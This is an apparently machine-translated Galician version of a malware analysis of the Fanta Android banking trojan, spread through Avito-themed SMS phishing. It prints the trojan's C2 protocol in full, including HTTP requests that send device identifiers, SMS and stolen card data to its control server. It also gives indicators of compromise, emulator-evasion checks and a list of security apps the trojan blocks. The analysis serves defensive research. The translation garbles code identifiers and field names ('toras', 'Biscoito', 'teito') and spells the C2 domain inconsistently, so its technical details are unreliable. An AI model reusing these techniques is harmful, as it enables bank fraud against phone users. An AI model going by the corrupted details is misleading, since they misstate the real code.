Un día queres vender algo en Avito e, despois de publicar unha descrición detallada do teu produto (por exemplo, un módulo RAM), recibirás esta mensaxe:
Unha vez que abras a ligazón, verás unha páxina aparentemente inocua que che notifica a ti, o vendedor feliz e exitoso, que se fixo unha compra:
Despois de facer clic no botón "Continuar", descargarase no teu dispositivo Android un ficheiro APK cunha icona e un nome que inspire confianza. Instalaches unha aplicación que por algún motivo solicitaba dereitos de AccesibilityService, despois apareceron un par de fiestras que desapareceron rapidamente e... Xa está.
Vai comprobar o seu saldo, pero por algún motivo a súa aplicación bancaria pide de novo os datos da súa tarxeta. Despois de introducir os datos, ocorre algo terrible: por algún motivo aínda non está claro para vostede, o diñeiro comeza a desaparecer da súa conta. Estás tentando resolver o problema, pero o teu teléfono resiste: preme as teclas "Atrás" e "Inicio", non se apaga e non che permite activar ningunha medida de seguridade. Como resultado, quédase sen diñeiro, os seus bens non foron comprados, está confuso e pregúntase: que pasou?
A resposta é sinxela: convertécheste nunha vítima do troiano Android Fanta, membro da familia Flexnet. Como pasou isto? Imos explicar agora.
Os autores: Andrey Polovinkin, especialista junior en análise de malware, Iván Pisarev, especialista en análise de malware.
Algunhas estatísticas
A familia Flexnet de troianos de Android fíxose coñecida por primeira vez en 2015. Durante un período de actividade bastante longo, a familia expandiuse a varias subespecies: Fanta, Limebot, Lipton, etc. O troiano, así como a infraestrutura asociada a el, non se quedan parados: estanse a desenvolver novos esquemas de distribución eficaces -no noso caso, páxinas de phishing de alta calidade dirixidas a un usuario-vendedor específico, e os desenvolvedores troianos seguen as tendencias de moda. escritura de virus: engade novas funcionalidades que permiten roubar cartos de forma máis eficiente dos dispositivos infectados e evitar os mecanismos de protección.
A campaña descrita neste artigo está dirixida a usuarios de Rusia; rexistráronse un pequeno número de dispositivos infectados en Ucraína e aínda menos en Casaquistán e Bielorrusia.
Aínda que Flexnet leva máis de 4 anos no troyano de Android e foi estudado en detalle por moitos investigadores, aínda está en boa forma. A partir de xaneiro de 2019, a cantidade potencial de danos é de máis de 35 millóns de rublos, e só para campañas en Rusia. En 2015, varias versións deste troiano de Android vendéronse en foros subterráneos, onde tamén se podía atopar o código fonte do troiano cunha descrición detallada. Isto significa que as estatísticas de danos no mundo son aínda máis impresionantes. Non é un mal indicador para un home tan vello, non si?
Da venda ao engano
Como se pode ver na captura de pantalla presentada anteriormente dunha páxina de phishing para o servizo de Internet para a publicación de anuncios Avito, foi preparada para unha vítima concreta. Ao parecer, os atacantes usan un dos analizadores de Avito, que extrae o número de teléfono e o nome do vendedor, así como a descrición do produto. Despois de ampliar a páxina e preparar o ficheiro APK, a vítima recibe unha SMS co seu nome e unha ligazón a unha páxina de phishing que contén unha descrición do seu produto e o importe recibido pola "venda" do produto. Ao facer clic no botón, o usuario recibe un ficheiro APK malicioso - Fanta.
Un estudo do dominio shcet491[.]ru mostrou que está delegado nos servidores DNS de Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
O ficheiro da zona de dominio contén entradas que apuntan aos enderezos IP 31.220.23[.]236, 31.220.23[.]243 e 31.220.23[.]235. Non obstante, o rexistro de recursos primarios do dominio (rexistro A) apunta a un servidor co enderezo IP 178.132.1[.]240.
O enderezo IP 178.132.1[.]240 está situado nos Países Baixos e pertence ao servidor. WorldStream. Os enderezos IP 31.220.23[.]235, 31.220.23[.]236 e 31.220.23[.]243 atópanse no Reino Unido e pertencen ao servidor de hospedaxe compartido HOSTINGER. Usado como gravadora openprov-ru. Os seguintes dominios tamén se resolveron co enderezo IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Hai que ter en conta que as ligazóns no seguinte formato estaban dispoñibles en case todos os dominios:
http://(www.){0,1}<%domain%>/[0-9]{7}
Este modelo tamén inclúe unha ligazón dunha mensaxe SMS. En base a datos históricos, descubriuse que un dominio corresponde a varias ligazóns no patrón descrito anteriormente, o que indica que se utilizou un dominio para distribuír o troiano a varias vítimas.
Avancemos un pouco: o troiano descargado a través dunha ligazón desde un SMS utiliza o enderezo como servidor de control onusedseddohap[.]club. Este dominio rexistrouse o 2019-03-12 e, a partir do 2019-04-29, as aplicacións APK interactuaron con este dominio. Segundo os datos obtidos de VirusTotal, un total de 109 aplicacións interactuaron con este servidor. O propio dominio resolto co enderezo IP 217.23.14[.]27, situado nos Países Baixos e propiedade do anfitrión WorldStream. Usado como gravadora nome barato. Os dominios tamén se resolveron a este enderezo IP bad-racoon[.]club (a partir do 2018-09-25) e bad-racoon[.]vive (a partir do 2018-10-25). Con dominio bad-racoon[.]club interactuou con máis de 80 ficheiros APK bad-racoon[.]vive - máis de 100.
En xeral, o ataque progresa do seguinte xeito:
Que hai debaixo da tapa de Fanta?
Como moitos outros troianos de Android, Fanta é capaz de ler e enviar mensaxes SMS, facer solicitudes USSD e mostrar as súas propias fiestras enriba das aplicacións (incluídas as bancarias). Non obstante, chegou o arsenal de funcionalidades desta familia: Fanta comezou a usar Servizo de Accesibilidade con diversos fins: ler o contido das notificacións doutras aplicacións, impedir a detección e deter a execución dun troiano nun dispositivo infectado, etc. Fanta funciona en todas as versións de Android non anteriores á 4.4. Neste artigo analizaremos a seguinte mostra de Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Inmediatamente despois do lanzamento
Inmediatamente despois do lanzamento, o troiano oculta a súa icona. A aplicación só pode funcionar se o nome do dispositivo infectado non está na lista:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (nafeta)
Esta comprobación realízase no servizo principal do troiano - Servizo principal. Cando se inicia por primeira vez, os parámetros de configuración da aplicación inícianse cos valores predeterminados (o formato para almacenar os datos de configuración e o seu significado discutiranse máis adiante), e un novo dispositivo infectado rexístrase no servidor de control. Enviarase unha solicitude HTTP POST co tipo de mensaxe ao servidor rexistrar_bot e información sobre o dispositivo infectado (versión de Android, IMEI, número de teléfono, nome do operador e código do país no que está rexistrado o operador). O enderezo serve como servidor de control hXXp://onuseseddohap[.]club/controller.php. Como resposta, o servidor envía unha mensaxe que contén os campos bot_id, bot_pwd, servidor — a aplicación garda estes valores como parámetros do servidor CnC. Parámetro servidor opcional se non se recibiu o campo: Fanta usa o enderezo de rexistro - hXXp://onuseseddohap[.]club/controller.php. A función de cambiar o enderezo CnC pode utilizarse para resolver dous problemas: para distribuír a carga uniformemente entre varios servidores (se hai un gran número de dispositivos infectados, a carga nun servidor web non optimizado pode ser elevada) e tamén para utilizar un servidor alternativo en caso de fallo dun dos servidores CnC .
Se se produce un erro ao enviar a solicitude, o troiano repetirá o proceso de rexistro despois de 20 segundos.
Unha vez que o dispositivo foi rexistrado correctamente, Fanta mostrará a seguinte mensaxe ao usuario:
Nota importante: o servizo chamou Seguridade do sistema — o nome do servizo de Troia, e despois de facer clic no botón ok Abrirase unha ventá coa configuración de accesibilidade do dispositivo infectado, onde o usuario debe conceder dereitos de accesibilidade para o servizo malicioso:
En canto o usuario se acende Servizo de Accesibilidade, Fanta accede aos contidos das fiestras da aplicación e ás accións realizadas nelas:
Inmediatamente despois de recibir os dereitos de accesibilidade, o troiano solicita dereitos de administrador e dereitos para ler as notificacións:
Usando o Servizo de Accesibilidade, a aplicación simula as pulsacións de teclas, dándolle así todos os dereitos necesarios.
Fanta crea varias instancias de base de datos (que se describirán máis adiante) necesarias para almacenar os datos de configuración, así como a información recollida no proceso sobre o dispositivo infectado. Para enviar a información recollida, o troiano crea unha tarefa repetida deseñada para descargar campos da base de datos e recibir un comando do servidor de control. O intervalo para acceder a CnC establécese dependendo da versión de Android: no caso da versión 5.1, o intervalo será de 10 segundos, noutro caso de 60 segundos.
Para recibir o comando, Fanta fai unha solicitude GetTask ao servidor de xestión. Como resposta, CnC pode enviar un dos seguintes comandos:
| Equipo | Descrición |
|---|---|
| 0 | Enviar mensaxe SMS |
| 1 | Fai unha chamada telefónica ou un comando USSD |
| 2 | Actualiza un parámetro intervalo |
| 3 | Actualiza un parámetro interceptar |
| 6 | Actualiza un parámetro smsManager |
| 9 | Comeza a recoller mensaxes SMS |
| 11 | Restablece o teu teléfono á configuración de fábrica |
| 12 | Activar/Desactivar o rexistro da creación da caixa de diálogo |
Fanta tamén recolle notificacións de 70 aplicacións bancarias, sistemas de pago rápido e carteiras electrónicas e gárdaas nunha base de datos.
Almacenamento de parámetros de configuración
Para almacenar parámetros de configuración, Fanta usa un enfoque estándar para a plataforma Android: Preferencias-arquivos. A configuración gardarase nun ficheiro chamado definicións. A descrición dos parámetros gardados aparece na táboa seguinte.
| nome | Valor predeterminado | Valores posibles | Descrición |
|---|---|---|---|
| id | 0 | Integer | ID do bot |
| servidor | hXXp://onuseseddohap[.]club/ | URL | Controlar o enderezo do servidor |
| pwd | - | Corda | Contrasinal do servidor |
| intervalo | 20 | Integer | Intervalo de tempo. Indica canto tempo deben aprazarse as seguintes tarefas:
|
| interceptar | todo | todo/número de teléfono | Se o campo é igual á cadea todo ou número de teléfono, entón a mensaxe SMS recibida será interceptada pola aplicación e non se mostrará ao usuario |
| smsManager | 0 | 0/1 | Activa/desactiva a aplicación como destinatario de SMS predeterminado |
| ReadDialog | teito | Verdadeiro/falso | Activar/Desactivar o rexistro de eventos Evento de accesibilidade |
Fanta tamén usa o ficheiro smsManager:
| nome | Valor predeterminado | Valores posibles | Descrición |
|---|---|---|---|
| pckg | - | Corda | Nome do xestor de mensaxes SMS utilizado |
Interacción con bases de datos
Durante o seu funcionamento, o troiano utiliza dúas bases de datos. Base de datos nomeada a usado para almacenar información recollida do teléfono. A segunda base de datos chámase fanta.db e úsase para gardar a configuración responsable da creación de ventás de phishing deseñadas para recoller información sobre tarxetas bancarias.
Trojan usa base de datos а para almacenar a información recollida e rexistrar as súas accións. Os datos gárdanse nunha táboa toras. Para crear unha táboa, use a seguinte consulta SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)A base de datos contén a seguinte información:
1. Rexistrando o inicio do dispositivo infectado cunha mensaxe O teléfono acendido!
2. Notificacións das aplicacións. A mensaxe xérase segundo o seguinte modelo:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Datos da tarxeta bancaria de formularios de phishing creados polo troiano. Parámetro VIEW_NAME pode ser un dos seguintes:
- AliExpress
- Avito
- Google Play
- Varios <%Nome da aplicación%>
A mensaxe está rexistrada no formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Mensaxes SMS entrantes/saíntes co formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Información sobre o paquete que crea a caixa de diálogo no formato:
(<%Package name%>)<%Package information%>
Táboa de exemplo toras:
Unha das funcionalidades de Fanta é a recollida de información sobre tarxetas bancarias. A recollida de datos prodúcese mediante a creación de ventás de phishing ao abrir aplicacións bancarias. O troiano crea a xanela de phishing só unha vez. A información de que a xanela foi mostrada ao usuario gárdase nunha táboa definicións na base de datos fanta.db. Para crear unha base de datos, use a seguinte consulta SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Todos os campos da táboa definicións por defecto inicializado en 1 (crear unha xanela de phishing). Despois de que o usuario introduza os seus datos, o valor establecerase en 0. Exemplo de campos de táboa definicións:
- pode_iniciar sesión — o campo é o encargado de mostrar o formulario ao abrir unha aplicación bancaria
- primeiro_banco - non utilizados
- can_avito — o campo encárgase de mostrar o formulario ao abrir a aplicación Avito
- can_ali — o campo encárgase de mostrar o formulario ao abrir a aplicación Aliexpress
- pode_outro — o campo é o encargado de mostrar o formulario ao abrir calquera solicitude da lista: Yula, Pandao, Drom Auto, Wallet. Tarxetas de desconto e bonificación, Aviasales, Booking, Trivago
- tarxeta_pota — o campo é o encargado de mostrar o formulario ao abrir Google Play
Interacción co servidor de xestión
A interacción da rede co servidor de xestión prodúcese a través do protocolo HTTP. Para traballar coa rede, Fanta usa a popular biblioteca Retrofit. As solicitudes envíanse a: hXXp://onuseseddohap[.]club/controller.php. O enderezo do servidor pódese cambiar ao rexistrarse no servidor. As cookies poden enviarse como resposta do servidor. Fanta fai as seguintes solicitudes ao servidor:
- O rexistro do bot no servidor de control ocorre unha vez, no primeiro lanzamento. Os seguintes datos sobre o dispositivo infectado envíanse ao servidor:
· Biscoito — cookies recibidas do servidor (o valor predeterminado é unha cadea baleira)
· modo - constante de corda rexistrar_bot
· prefixo - constante enteira 2
· versión_sdk - está formado segundo o seguinte modelo: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI do dispositivo infectado
· país — código do país no que está rexistrado o operador, en formato ISO
· número - número de teléfono
· operador - nome do operadorUn exemplo de solicitude enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>En resposta á solicitude, o servidor debe devolver un obxecto JSON que conteña os seguintes parámetros:
· bot_id - ID do dispositivo infectado. Se bot_id é igual a 0, Fanta volverá executar a solicitude.
bot_pwd - contrasinal para o servidor.
servidor - controlar o enderezo do servidor. Parámetro opcional. Se non se especifica o parámetro, empregarase o enderezo gardado na aplicación.Exemplo de obxecto JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Solicitude de recibir un comando do servidor. Os seguintes datos son enviados ao servidor:
· Biscoito — cookies recibidas do servidor
· oferta — ID do dispositivo infectado que se recibiu ao enviar a solicitude rexistrar_bot
· pwd -contrasinal para o servidor
· admin_divizio — o campo determina se se obtiveron dereitos de administrador. Se se obtiveron dereitos de administrador, o campo é igual a 1, se non 0
· Accesibilidade — Estado de funcionamento do Servizo de Accesibilidade. Se se iniciou o servizo, o valor é 1, se non 0
· SMSManager — mostra se o troiano está activado como a aplicación predeterminada para recibir SMS
· pantalla — mostra en que estado se atopa a pantalla. O valor establecerase 1, se a pantalla está acesa, se non 0;Un exemplo de solicitude enviada ao servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Dependendo do comando, o servidor pode devolver un obxecto JSON con diferentes parámetros:
· Equipo Enviar mensaxe SMS: Os parámetros conteñen o número de teléfono, o texto da mensaxe SMS e o ID da mensaxe que se envía. O identificador úsase cando se envía unha mensaxe ao servidor con tipo setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Equipo Fai unha chamada telefónica ou un comando USSD: O número de teléfono ou o comando aparece no corpo da resposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Equipo Cambiar parámetro de intervalo.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Equipo Cambiar o parámetro de intercepción.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Equipo Cambiar o campo SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Equipo Recolle mensaxes SMS dun dispositivo infectado.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Equipo Restablece o teu teléfono á configuración de fábrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Equipo Cambiar parámetro ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Enviando unha mensaxe con tipo setSmsStatus. Esta solicitude faise despois de executar o comando Enviar mensaxe SMS. A solicitude ten este aspecto:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Cargando contidos da base de datos. Transmítese unha fila por solicitude. Os seguintes datos son enviados ao servidor:
· Biscoito — cookies recibidas do servidor
· modo - constante de corda setSaveInboxSms
· oferta — ID do dispositivo infectado que se recibiu ao enviar a solicitude rexistrar_bot
· texto — texto no rexistro actual da base de datos (campo d da mesa toras na base de datos а)
· número — nome do rexistro actual da base de datos (campo p da mesa toras na base de datos а)
· modo_sms — valor enteiro (campo m da mesa toras na base de datos а)A solicitude ten este aspecto:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Se se envía correctamente ao servidor, a fila eliminarase da táboa. Exemplo dun obxecto JSON devolto polo servidor:
{ "response":[], "status":"ok" }
Interactuando co Servizo de Accesibilidade
Implementouse o servizo de accesibilidade para que os dispositivos Android sexan máis fáciles de usar para persoas con discapacidade. Na maioría dos casos, é necesaria a interacción física para interactuar cunha aplicación. AccessibilityService permítelle facelos mediante programación. Fanta utiliza o servizo para crear fiestras falsas en aplicacións bancarias e evitar que os usuarios abran a configuración do sistema e algunhas aplicacións.
Usando a funcionalidade do Servizo de Accesibilidade, o troiano supervisa os cambios nos elementos da pantalla do dispositivo infectado. Como se describiu anteriormente, a configuración de Fanta contén un parámetro responsable das operacións de rexistro con caixas de diálogo: ReadDialog. Se se define este parámetro, engadirase á base de datos información sobre o nome e a descrición do paquete que provocou o evento. O troiano realiza as seguintes accións cando se desencadean eventos:
- Simula a presión das teclas de retroceso e inicio nos seguintes casos:
· se o usuario quere reiniciar o seu dispositivo
· se o usuario quere eliminar a aplicación “Avito” ou cambiar os dereitos de acceso
· se hai unha mención á aplicación “Avito” na páxina
· ao abrir a aplicación Google Play Protect
· ao abrir páxinas coa configuración do Servizo de Accesibilidade
· cando apareza o cadro de diálogo Seguridade do sistema
· ao abrir a páxina coa configuración "Debuxar sobre outra aplicación".
· ao abrir a páxina "Aplicacións", "Recuperación e restablecemento", "Reinicio de datos", "Restablecer configuración", "Panel de desenvolvedores", "Especial. oportunidades", "Oportunidades especiais", "Dereitos especiais"
· se o evento foi xerado por determinadas aplicacións.Lista de solicitudes
- androide
- Mestre Lite
- Mestre limpo
- Clean Master para CPU x86
- Xestión de permisos da aplicación Meizu
- Seguridade MIUI
- Clean Master - Limpador de lixo e antivirus e caché
- Controis parentais e GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Limpador de virus, antivirus, limpador (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus e protección gratuíta 2019
- Seguridade móbil MegaFon
- Protección AVG para Xperia
- Seguridade móbil
- Antivirus e protección Malwarebytes
- Antivirus para Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- Antivirus AVG para o xestor do sistema de tabletas Huawei
- Accesibilidade Samsung
- Samsung Smart Manager
- Mestre de seguridade
- Speed Booster
- dr.web
- Espazo de seguridade Dr.Web
- Centro de control móbil Dr.Web
- Dr.Web Security Space Life
- Centro de control móbil Dr.Web
- Antivirus e seguridade móbil
- Kaspersky Internet Security: antivirus e protección
- Duración da batería de Kaspersky: aforro e potenciador
- Kaspersky Endpoint Security: protección e xestión
- AVG Antivirus free 2019 – Protección para Android
- Antivirus de Android
- Norton Mobile Security e antivirus
- Antivirus, firewall, VPN, seguridade móbil
- Seguridade móbil: antivirus, VPN, protección contra roubos
- Antivirus para Android
- Se se solicita permiso ao enviar unha mensaxe SMS a un número curto, Fanta simula facer clic na caixa de verificación Lembra a elección e botón para enviar.
- Cando tentas quitarlle os dereitos de administrador ao troiano, bloquea a pantalla do teléfono.
- Evita engadir novos administradores.
- Se a aplicación antivirus dr.web detectou unha ameaza, Fanta imita premer o botón ignorar.
- O troiano simula premer o botón Atrás e Inicio se o evento foi xerado pola aplicación Coidado do dispositivo Samsung.
- Fanta crea fiestras de phishing con formularios para introducir información sobre tarxetas bancarias se se lanzou unha aplicación dunha lista duns 30 servizos de Internet diferentes. Entre eles: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Formularios de phishing
Fanta analiza que aplicacións se están executando no dispositivo infectado. Se se abriu unha aplicación de interese, o troiano mostra unha xanela de phishing encima de todas as demais, que é un formulario para introducir a información da tarxeta bancaria. O usuario debe introducir os seguintes datos:
- Número de tarxeta
- Data de caducidade da tarxeta
- CVV
- Nome do titular da tarxeta (non para todos os bancos)
Dependendo da aplicación en execución, mostraranse diferentes ventás de phishing. A continuación móstranse exemplos dalgúns deles:
AliExpress:
Avito:
Para algunhas outras aplicacións, p. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Como foi realmente
Afortunadamente, a persoa que recibiu a mensaxe SMS descrita ao comezo do artigo resultou ser un especialista en ciberseguridade. Polo tanto, a versión real, non do director, difire da contada anteriormente: unha persoa recibiu un SMS interesante, despois de que llo deu ao equipo de Intelixencia de caza de ameazas do Grupo-IB. O resultado do ataque é este artigo. Final feliz, non? Non obstante, non todas as historias terminan con tanto éxito, e para que a túa non pareza un corte de director cunha perda de diñeiro, na maioría dos casos é suficiente cumprir as seguintes regras longamente descritas:
- non instales aplicacións para un dispositivo móbil con sistema operativo Android desde ningunha fonte que non sexa Google Play
- Ao instalar unha aplicación, preste especial atención aos dereitos que solicita a aplicación
- preste atención ás extensións dos ficheiros descargados
- instalar actualizacións do sistema operativo Android con regularidade
- non visite recursos sospeitosos e non descargue ficheiros desde alí
- Non faga clic nas ligazóns recibidas en mensaxes SMS.
Fonte: www.habr.com